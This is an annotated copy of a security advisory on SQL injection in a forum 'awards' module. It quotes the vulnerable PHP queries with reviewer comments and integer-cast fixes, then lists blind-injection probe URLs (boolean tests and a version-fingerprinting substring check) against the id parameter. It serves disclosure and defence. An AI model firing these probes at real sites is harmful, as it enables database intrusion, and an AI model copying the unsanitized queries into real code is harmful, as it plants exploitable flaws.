-- [Vuln Code] --
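// Awards "view" query as quoted by the advisory. The published listing lost its
// single quotes and its spacing; both are restored here so the statement reads
// as PHP again. The alias 'a' for the `awarded` table is blank in the listing
// and is inferred from the a.user_id / a.award_id references. Confirm it
// against the module source.
$this->ipsclass->DB->build_query(array(
    'select'   => 'a.user_id',
    'from'     => array('awarded' => 'a'),
    // VULNERABLE: the request parameter `id` is concatenated into the WHERE
    // clause as a bare, unquoted value. No quote character is needed to append
    // extra SQL after it, so any quote-escaping applied to the input upstream
    // would not stop it. Fix: force an integer before it reaches the query
    // text, e.g.
    //   'where' => 'a.award_id=' . intval($this->ipsclass->input['id']),
    'where'    => 'a.award_id=' . $this->ipsclass->input['id'],
    'add_join' => array(
        0 => array(
            'select' => 'm.members_display_name',
            'from'   => array('members' => 'm'),
            'where'  => 'm.id=a.user_id',
            'type'   => 'left',
        ),
    ),
));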
----------------------------------------------------------------------------------------------
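// Second query site. The advisory's listing starts partway through the call:
// its opening is not shown, only the array entries and the closing "));".
// Single quotes are restored here; the double quotes around the value are kept
// exactly where the listing has them. NOTE(review): confirm the quoting against
// the module source.
    'select' => '*',
    'from'   => 'awards',
    // VULNERABLE: raw $_POST['award'] is spliced into the SQL text with no
    // validation. Fix: cast it before use, e.g. intval($_POST['award'])
    // (presumably `id` is a numeric column, verify), or escape it with the
    // database layer's own escaping routine.
    'where'  => 'id="' . $_POST['award'] . '"',
));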
----------------------------------------------------------------------------------------------
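// Award-assignment data as quoted by the advisory (quotes and spacing restored).
// VULNERABLE: both ids are copied straight from the request with no validation.
// Where $award_dat goes next is outside the listing; presumably it is written
// to the database, verify against the module source.
// Fix: store integers only, e.g. intval($_GET['id']) and intval($_POST['award']).
$award_dat['user_id']  = $_GET['id'];
$award_dat['award_id'] = $_POST['award'];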
######################################## ########
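-- [Exploitable] --
(The id parameter feeds the a.award_id comparison in the first listing above. A legitimate request carries digits only, so any other characters in id on autocom=awards&do=view requests are worth logging and alerting on.)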
Http: // server/index. php? Autocom = awards & do = view & id = 1 [SQL INJECTION]
Http: // server/index. php? Autocom = awards & do = view & id = 1 + and + 1 = 1> true
Http: // server/index. php? Autocom = awards & do = view & id = 1 + and + 1 = 0> false
Http: // server/index. php? Autocom = awards & do = view & id = 1 + and + substring (version (), 1, 1) = 5
Http: // server/index. php? Autocom = awards & do = view & id = 1 + and + substring (version (), 1, 1) = 4
######################################## ########